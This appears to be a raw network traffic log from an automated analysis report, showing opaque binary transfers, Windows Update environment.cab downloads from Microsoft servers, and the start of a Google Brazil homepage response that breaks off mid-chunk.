2024-07-04 17:39:59 UTC	16384	IN	Data Raw: cd 18 3d dd be 60 6f 71 25 6e 37 30 a2 24 ed 4e 9e 68 a8 d0 50 dc b0 78 a1 43 21 76 63 c2 77 c1 18 89 a7 73 03 15 87 e2 26 92 94 05 5a f0 3f b4 c9 94 7a 4d 22 a8 da ad d2 96 bb 2d c3 a5 cb ce d5 97 50 b9 2f 3a a7 6e e5 c2 5a 04 a3 ac fe f2 cc 8b c7 95 df b1 2f 71 e9 cd b1 c1 62 b4 8c c3 b7 90 1c 13 e7 22 af c4 db 8a d2 98 1c 90 4f 89 2d 15 16 aa 4c ab c5 bc 31 e1 b5 ab 6a aa bf 23 c7 9e 9e ca 1b af 76 aa b5 cf 34 2f 0d bf 91 fa 64 6d 20 ae cd fe 15 e2 3d ab 94 f0 d1 71 36 1c 5d d6 15 73 6d 50 66 f8 31 6b 51 0a 37 4c b2 cb bf 5e 5b ee 66 af f9 92 0b c7 59 d2 be 6e 53 c0 21 7f b2 9a c1 9e 8e f4 fb 10 c6 9a ed 02 85 af fd b0 74 ea 8c ef 76 7c 50 cf 51 9b 3d 74 c9 fb 75 1f d9 9a 5d ec 55 4c 7d 2c da fe 8d 0b d2 13 66 a1 85 74 51 9b 21 8a 6e b5 1b f1 bf b0 1f Data Ascii: =`oq%n70$NhPxC!vcws&Z?zM"-P/:nZ/qb"O-L1j#v4/dm =q6]smPf1kQ7L^[fYnS!tv\|PQ=tu]UL},ftQ!n
2024-07-04 17:39:59 UTC	16384	IN	Data Raw: 1c ee 66 da a7 1c ed 97 a8 91 7a 1c b7 da 70 e6 2c cd ee 95 2f 34 64 eb df 15 01 d7 94 76 0a d1 40 3d d1 18 cd 90 a4 16 eb d5 d8 74 fd 8e e1 f7 86 b5 c5 4b 25 63 56 4b 1d 77 19 16 fa 58 b1 ae 0a 06 e7 95 00 de a2 6f 39 c2 ff 32 c1 8c 6a d2 e1 79 b6 20 d6 4d 24 84 f8 17 18 5b dd da 87 aa 61 8e 3e 7d 3f 6a 05 30 69 61 c0 83 73 b2 cb 21 38 33 b6 e1 d5 de 8d d3 26 cd cc 53 91 05 37 be f3 2a 7d cb e1 17 be fe e7 c6 69 1f c0 69 c8 af 7e ab 84 f2 50 72 54 7c 8d de 58 cf 24 99 76 24 11 36 af 8a 91 98 91 fc 85 cf d7 26 08 ff 78 de 73 06 01 fd 8b 68 b7 95 91 f4 67 c4 c7 9f b5 6a 43 43 55 12 e5 9e 1b 20 79 53 ea 51 0f ed a2 db b8 ae 1b 9f 78 61 00 0a ef 61 f0 36 81 85 5d a3 f9 8f 07 21 9f 8d 06 9e 93 77 c6 55 b8 29 e0 dd 19 53 45 08 1b d9 af ac 78 3b a9 9d 7a 5f 4b Data Ascii: fzp,/4dv@=tK%cVKwXo92jy M$[a>}?j0ias!83&S7*}ii~PrT\|X$v$6&xshgjCCU ySQxaa6]!wU)SEx;z_K
2024-07-04 17:39:59 UTC	16384	IN	Data Raw: 35 a7 d0 80 1f fa bf 09 15 c1 25 d5 81 99 7a 9c 31 97 f9 0f 4b ac 90 42 c7 be ed 32 52 d2 a9 22 7a d6 18 a7 40 0b ae 5c 26 44 bd 10 89 13 99 8f 29 0f ae e6 42 7c 22 18 02 95 d8 8f 4a cb 1b ff 86 cd 9d 8c c7 ed b0 19 a9 8e da 93 15 e9 e1 b4 a8 d8 d2 a9 35 87 b2 c2 fc ae e2 ab a5 72 46 05 76 b4 a2 9d b1 4a 0f 8f ca 43 d3 53 a3 e0 ad 82 4d 36 19 f2 e0 98 e0 5b 32 a0 d3 d7 f3 86 d5 cf fe da 05 fc 47 33 b7 25 1b 7b a0 97 5b 4d f6 9b 03 dc 1a 1f 09 aa 4d 91 3b 6b 30 a3 91 81 3d e2 d5 a0 ca ad 89 d3 ae 98 e2 12 9b 8b 01 3e 9a 48 0e 67 20 cf dd 49 e7 86 10 77 4e 04 f1 a6 6d 7e 91 21 6a ba 7a 48 65 6b 1c 46 1b 80 24 c2 77 32 77 2c 82 d6 b9 18 8a 0e d2 fc 98 41 8a a6 08 83 a0 3a 31 da ae 37 5e f5 b5 73 81 1c 60 59 01 77 76 14 04 66 23 04 2a 89 d5 19 bc a6 61 cc 87 Data Ascii: 5%z1KB2R"z@\&D)B\|"J5rFvJCSM6[2G3%{[MM;k0=>Hg IwNm~!jzHekF$w2w,A:17^s`Ywvf#*a
2024-07-04 17:39:59 UTC	16384	IN	Data Raw: 23 bc 2c 0e c9 01 a5 64 67 b6 26 9f cf 79 d6 da e2 85 a1 b2 e6 34 db ec a4 9f c8 b2 7c 82 32 df c6 b8 a7 58 cc 12 8c 77 81 e3 d4 59 e2 9f 2a 92 cf 56 be 1e 3f d0 17 63 31 d7 a9 73 89 a8 90 a3 b8 17 c4 0c 3e d0 b7 03 e1 1b f7 bd 49 2c bf cc 4b 1b aa ff 6b b8 64 a3 01 5f 87 23 b4 a0 ba 0d c1 f3 86 b6 32 b8 2f a4 3c 90 97 ed 72 d7 b5 08 16 68 c6 80 89 d5 ac 1d f3 9c 07 e6 76 b2 82 9c 66 c5 ec ac de b7 07 79 e5 fc d8 ec 3d b8 69 84 ca f5 af e5 2e ec c0 c2 84 b2 59 cc ff b1 8d 35 b7 db e1 09 8a 70 04 5d e6 4a b7 dd 7b c1 50 b6 00 45 c7 33 81 46 dd e1 18 46 af 32 fc e8 ed 06 a8 e2 18 b0 18 df 54 25 9f cb d5 84 12 34 c4 7d db 00 dd c9 a5 4d 39 8f c7 79 cd 4f 01 5c 0d 6c d7 1b 1b e0 90 af 02 95 75 4d f6 a4 c9 3f 78 d2 67 5d 73 a1 a8 ad 8e 31 fa 24 0c fd 09 74 28 Data Ascii: #,dg&y4\|2XwY*V?c1s>I,Kkd_#2/<rhvfy=i.Y5p]J{PE3FF2T%4}M9yO\luM?xg]s1$t(
2024-07-04 17:39:59 UTC	16384	IN	Data Raw: 61 b0 58 52 8f 04 62 f6 81 08 b4 a3 45 7f fa 0b fe 52 ae e0 05 19 fa bb c8 b1 c5 ab 3e 97 15 11 20 02 e5 91 16 23 82 4c c3 d0 db 6e 36 c4 ae ad ce a4 ff a5 1f e2 0e 14 e2 76 17 db 50 55 b3 9e 2a 67 74 33 ce a6 b1 fc 44 9f c5 61 1e 57 fd a9 e5 0f ad 00 2f f5 c5 9b 21 35 b9 db e9 b0 b6 2a ef 15 f9 0e 2d ae c4 be 92 78 b7 15 f1 62 d6 3d 0f d7 11 08 e6 f2 d3 d2 ff b0 b1 3c c4 97 53 ff ff f7 39 10 ff d2 cb a1 58 48 1a 3b b7 f3 c7 80 59 98 fd 9f dd c6 b6 e2 10 f4 cb 0a 32 31 2a 03 1e fb 3e 4d 09 cd d5 99 f7 01 b2 b5 e7 5c b7 46 2d 74 08 44 3d 06 e3 e8 fb 1f a8 2b 0d 06 ea b9 c4 17 e0 ed 61 aa d0 c4 70 80 af a6 7d 63 ac 2a a9 43 16 ae 8d 0b d0 fe 30 d7 b0 85 77 9f b1 a0 fa a2 5f ea 43 e5 f9 fa 2f ff 22 0e a3 05 f2 02 8a a5 c9 a0 f0 4b ce ab cc 9c b6 f3 89 cc 05 Data Ascii: aXRbER> #Ln6vPUgt3DaW/!5-xb=<S9XH;Y21>M\F-tD=+ap}cC0w_C/"K
2024-07-04 17:39:59 UTC	16384	IN	Data Raw: 11 46 1c 13 19 ea f2 7c e8 42 25 d4 00 16 58 c1 87 99 76 e3 38 31 77 d0 2d ce ca 95 54 8a 9f 49 8b 66 33 bd 64 6d cb de c0 7a 2c 51 36 8c da ab 54 dc 78 bb aa 69 c4 db 8b 93 e8 9f 1d 27 8a 31 0b 94 56 02 d4 91 d9 c4 37 09 db e9 03 8b 36 4d e2 11 56 e4 44 76 66 6b fa 42 50 08 3c d5 cf 67 04 9a 2d 40 ea 99 f9 e8 36 7b 2a 4f 81 e3 24 2c e1 b6 b1 ed 00 d8 c9 a6 08 1a f5 0b 92 24 6c 43 12 6d e9 d1 e2 99 78 ee 71 da 54 c7 14 ed ff 23 f9 0f 6e d2 85 59 7f 9c db f7 8e f6 91 68 d8 c1 ee e9 70 a8 9a a0 76 42 ea 61 82 4c 51 70 aa 63 d6 ad 4d bf f1 01 29 67 bc b1 ce 56 e7 5c 1c 6e 07 7e 0f 9d 06 e3 ac 0f 43 78 cf 36 09 fc ef c3 b1 57 ab a1 5c 60 0b 59 df 95 83 cb bc a7 ca e3 8f 71 22 28 ce 96 b7 73 12 08 5d 6c 36 9b 4a bc c8 6e 3f 11 a4 19 ee 84 53 02 2e 80 57 34 c5 Data Ascii: F\|B%Xv81w-TIf3dmz,Q6Txi'1V76MVDvfkBP<g-@6{*O$,$lCmxqT#nYhpvBaLQpcM)gV\n~Cx6W\`Yq"(s]l6Jn?S.W4
2024-07-04 17:39:59 UTC	16384	IN	Data Raw: 17 5d 62 b2 6a d1 d8 91 9c 75 bf ab a5 f8 56 6b 5e 4f 29 49 91 8b f1 ab cd af 61 af 55 d1 f3 22 df 79 22 1c 61 8b a9 17 35 17 d6 28 4c b9 e3 c9 06 d3 29 c0 45 b7 e0 5b 01 05 ce ee 3f d9 0c 98 4f 73 48 b6 31 a2 22 5c 69 0c 11 0c be e6 28 5a c5 76 a1 2d 65 c1 ee 63 0e 06 99 c9 c8 bd a2 9d d6 c2 95 b4 80 db e5 35 d3 66 12 c7 5e ee 8d d2 04 89 7a 50 56 d3 b2 89 6b 43 06 d2 f4 9d ca e5 1e c9 1f 13 f7 fd 54 fe b2 a3 6a e5 eb 8d 26 13 00 fb 14 8d b2 01 e5 03 26 14 86 22 73 7f 6a e2 46 f1 8d 33 d5 84 88 19 d2 46 fe b4 46 14 b6 bd 7a 0a a3 a7 b1 3a 68 0d 82 ac 2d de 46 69 bf 45 c4 d8 f8 8d d0 74 92 ec a7 9f 48 23 5d eb c5 d9 42 e2 b7 9b dd 18 1e da b5 35 b6 ec e5 96 c7 df 6a cf f5 0d 81 d2 eb d5 5d 07 30 1c bd f9 2f 93 ed 2c 38 be 05 55 65 aa 72 63 5a 70 42 8c 0d Data Ascii: ]bjuVk^O)IaU"y"a5(L)E[?OsH1"\i(Zv-ec5f^zPVkCTj&&"sjF3FFz:h-FiEtH#]B5j]0/,8UercZpB

Timestamp	Bytes transferred	Direction	Data
2024-07-04 17:40:14 UTC	306	OUT	GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=BN45lRbF8D5mNkZ&MD=SD7sv3mO HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-07-04 17:40:15 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880" MS-CorrelationId: 85e0734e-bd77-485b-acb1-805f0b7e94f6 MS-RequestId: 1267cc12-a9de-4c58-b69d-9d8db00ca2dc MS-CV: scgzitbrZUyjSaUL.0 X-Microsoft-SLSClientCache: 2880 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Thu, 04 Jul 2024 17:40:14 GMT Connection: close Content-Length: 24490
2024-07-04 17:40:15 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58 Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
2024-07-04 17:40:15 UTC	8666	IN	Data Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31 Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1

Timestamp	Bytes transferred	Direction	Data
2024-07-04 17:40:52 UTC	306	OUT	GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=BN45lRbF8D5mNkZ&MD=SD7sv3mO HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-07-04 17:40:52 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440" MS-CorrelationId: 46097497-69e7-4dce-87f7-3be227b8957f MS-RequestId: 1a7edddb-72ce-4cbc-bbae-4f0e281bc44e MS-CV: x9zUTSh66EGaFxZj.0 X-Microsoft-SLSClientCache: 1440 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Thu, 04 Jul 2024 17:40:52 GMT Connection: close Content-Length: 30005
2024-07-04 17:40:52 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK\|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
2024-07-04 17:40:52 UTC	14181	IN	Data Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro

Timestamp	Bytes transferred	Direction	Data
2024-07-04 17:43:03 UTC	660	OUT	GET / HTTP/1.1 Host: www.google.com.br Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-07-04 17:43:03 UTC	1669	IN	HTTP/1.1 200 OK Date: Thu, 04 Jul 2024 17:43:03 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-usSRIsjHjL-LMaGFDNrBXA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/other"}]} Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Set-Cookie: AEC=AVYB7cq9qpLJtwr_4wn6NSmj1M2L8sIKMTV2uqdncAQEzqqvSiIgeGgGkw; expires=Tue, 31-Dec-2024 17:43:03 GMT; path=/; domain=.google.com.br; Secure; HttpOnly; SameSite=lax Set-Cookie: NID=515=rRBxRmJa0EpbZFLBmIw0OARb1ECo0TN6kBMUJ3KsZiO3FjmZRPHNzcSANFCPHOKq2LNPNVl_GnJ_E3CS7ETtmHCXqb56gef_UpALXxC-tS80FXnRBSev-If-hQpQpMPDdvyzxhlw_gyJu7IBhtrSyY-npOLrVKEHVXEr68Aj7gQ; expires=Fri, 03-Jan-2025 17:43:03 GMT; path=/; domain=.google.com.br; Secure; HttpOnly; SameSite=none Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-07-04 17:43:03 UTC	1669	IN	Data Raw: 32 34 30 33 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 69 74 65 6d 73 63 6f 70 65 3d 22 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6f 72 69 67 69 6e 22 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 67 2f 31 78 2f 67 6f 6f 67 6c 65 67 5f 73 74 61 6e 64 61 72 64 5f 63 6f 6c 6f 72 5f 31 32 38 64 70 2e 70 6e 67 22 20 69 74 65 6d 70 72 6f 70 3d 22 69 6d 61 67 65 22 3e 3c 74 69 74 6c 65 3e Data Ascii: 2403<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en"><head><meta charset="UTF-8"><meta content="origin" name="referrer"><meta content="/images/branding/googleg/1x/googleg_standard_color_128dp.png" itemprop="image"><title>
2024-07-04 17:43:03 UTC	1669	IN	Data Raw: 68 3b 6e 5b 67 5d 3d 61 3b 61 2e 6f 6e 65 72 72 6f 72 3d 61 2e 6f 6e 6c 6f 61 64 3d 61 2e 6f 6e 61 62 6f 72 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 64 65 6c 65 74 65 20 6e 5b 67 5d 7d 3b 61 2e 73 72 63 3d 63 7d 7d 3b 67 6f 6f 67 6c 65 2e 6c 6f 67 55 72 6c 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 62 3d 62 3d 3d 3d 76 6f 69 64 20 30 3f 6c 3a 62 3b 72 65 74 75 72 6e 20 74 28 22 22 2c 61 2c 62 29 7d 3b 7d 29 2e 63 61 6c 6c 28 74 68 69 73 29 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 67 6f 6f 67 6c 65 2e 79 3d 7b 7d 3b 67 6f 6f 67 6c 65 2e 73 79 3d 5b 5d 3b 67 6f 6f 67 6c 65 2e 78 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 61 29 76 61 72 20 63 3d 61 2e 69 64 3b 65 6c 73 65 7b 64 6f 20 63 3d 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 3b 77 68 69 6c 65 28 Data Ascii: h;n[g]=a;a.onerror=a.onload=a.onabort=function(){delete n[g]};a.src=c}};google.logUrl=function(a,b){b=b===void 0?l:b;return t("",a,b)};}).call(this);(function(){google.y={};google.sy=[];google.x=function(a,b){if(a)var c=a.id;else{do c=Math.random();while(
2024-07-04 17:43:03 UTC	1669	IN	Data Raw: 73 63 2e 6e 73 2c 72 3d 71 3f 61 61 7c 7c 77 69 6e 64 6f 77 2e 70 65 72 66 6f 72 6d 61 6e 63 65 2e 74 69 6d 69 6e 67 2e 6e 61 76 69 67 61 74 69 6f 6e 53 74 61 72 74 3a 76 6f 69 64 20 30 3b 66 75 6e 63 74 69 6f 6e 20 74 28 29 7b 72 65 74 75 72 6e 20 77 69 6e 64 6f 77 2e 70 65 72 66 6f 72 6d 61 6e 63 65 2e 6e 6f 77 28 29 2d 28 67 6f 6f 67 6c 65 2e 73 74 76 73 63 26 26 67 6f 6f 67 6c 65 2e 73 74 76 73 63 2e 70 6e 6f 7c 7c 30 29 7d 76 61 72 20 62 61 3d 67 6f 6f 67 6c 65 2e 73 74 76 73 63 26 26 67 6f 6f 67 6c 65 2e 73 74 76 73 63 2e 72 73 2c 75 3d 71 3f 62 61 7c 7c 77 69 6e 64 6f 77 2e 70 65 72 66 6f 72 6d 61 6e 63 65 2e 74 69 6d 69 6e 67 2e 72 65 73 70 6f 6e 73 65 53 74 61 72 74 3a 76 6f 69 64 20 30 3b 66 75 6e 63 74 69 6f 6e 20 63 61 28 61 2c 62 2c 63 29 7b Data Ascii: sc.ns,r=q?aa\|\|window.performance.timing.navigationStart:void 0;function t(){return window.performance.now()-(google.stvsc&&google.stvsc.pno\|\|0)}var ba=google.stvsc&&google.stvsc.rs,u=q?ba\|\|window.performance.timing.responseStart:void 0;function ca(a,b,c){
2024-07-04 17:43:03 UTC	1669	IN	Data Raw: 2e 64 65 74 61 63 68 45 76 65 6e 74 28 22 6f 6e 22 2b 62 2c 63 29 7d 3b 76 61 72 20 6c 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 74 68 69 73 2e 67 3d 61 3b 74 68 69 73 2e 76 3d 5b 5d 3b 74 68 69 73 2e 42 3d 74 68 69 73 2e 67 2e 68 61 73 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 6e 6f 61 66 74 22 29 3b 74 68 69 73 2e 6a 3d 21 21 74 68 69 73 2e 67 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 64 65 66 65 72 72 65 64 22 29 3b 76 61 72 20 64 3b 69 66 28 64 3d 21 74 68 69 73 2e 6a 29 61 3a 7b 66 6f 72 28 64 3d 30 3b 64 3c 43 2e 6c 65 6e 67 74 68 3b 2b 2b 64 29 69 66 28 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 22 2b 43 5b 64 5d 29 29 7b 64 3d 21 30 3b 62 72 65 61 6b 20 61 7d 64 3d 21 31 7d 74 68 69 73 2e 6c Data Ascii: .detachEvent("on"+b,c)};var la=function(a,b,c){this.g=a;this.v=[];this.B=this.g.hasAttribute("data-noaft");this.j=!!this.g.getAttribute("data-deferred");var d;if(d=!this.j)a:{for(d=0;d<C.length;++d)if(a.getAttribute("data-"+C[d])){d=!0;break a}d=!1}this.l
2024-07-04 17:43:03 UTC	1669	IN	Data Raw: 2c 64 3d 62 2e 6c 65 6e 67 74 68 3b 63 3c 64 3b 2b 2b 63 29 61 28 48 28 62 5b 63 5d 29 29 7d 3b 66 75 6e 63 74 69 6f 6e 20 6e 61 28 61 29 7b 69 66 28 61 26 26 28 61 3d 61 2e 74 61 72 67 65 74 2c 61 2e 74 61 67 4e 61 6d 65 3d 3d 3d 22 49 4d 47 22 29 29 7b 76 61 72 20 62 3d 44 61 74 65 2e 6e 6f 77 28 29 3b 46 28 48 28 61 2c 76 6f 69 64 20 30 2c 21 30 2c 21 30 29 2c 62 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 4a 28 61 29 7b 67 6f 6f 67 6c 65 2e 63 2e 6f 69 6c 28 61 29 7d 3b 67 6f 6f 67 6c 65 2e 74 69 6d 65 72 73 3d 7b 7d 3b 67 6f 6f 67 6c 65 2e 73 74 61 72 74 54 69 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 67 6f 6f 67 6c 65 2e 74 69 6d 65 72 73 5b 61 5d 3d 7b 74 3a 7b 73 74 61 72 74 3a 44 61 74 65 2e 6e 6f 77 28 29 7d 2c 65 3a 7b 7d 2c 6d 3a 7b 7d 7d 7d 3b 67 Data Ascii: ,d=b.length;c<d;++c)a(H(b[c]))};function na(a){if(a&&(a=a.target,a.tagName==="IMG")){var b=Date.now();F(H(a,void 0,!0,!0),b)}}function J(a){google.c.oil(a)};google.timers={};google.startTick=function(a){google.timers[a]={t:{start:Date.now()},e:{},m:{}}};g
2024-07-04 17:43:03 UTC	882	IN	Data Raw: 61 6e 67 65 22 2c 50 2c 21 30 29 3b 4f 28 30 29 3b 77 26 26 28 67 6f 6f 67 6c 65 2e 63 2e 6f 69 6c 3d 6e 61 2c 41 28 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2c 22 6c 6f 61 64 22 2c 4a 2c 21 30 29 2c 41 28 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2c 22 65 72 72 6f 72 22 2c 4a 2c 21 30 29 29 3b 67 6f 6f 67 6c 65 2e 63 76 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 29 7b 69 66 28 21 61 7c 7c 21 62 26 26 64 61 28 61 29 29 72 65 74 75 72 6e 20 30 3b 69 66 28 21 61 2e 67 65 74 42 6f 75 6e 64 69 6e 67 43 6c 69 65 6e 74 52 65 63 74 29 72 65 74 75 72 6e 20 31 3b 76 61 72 20 65 3d 66 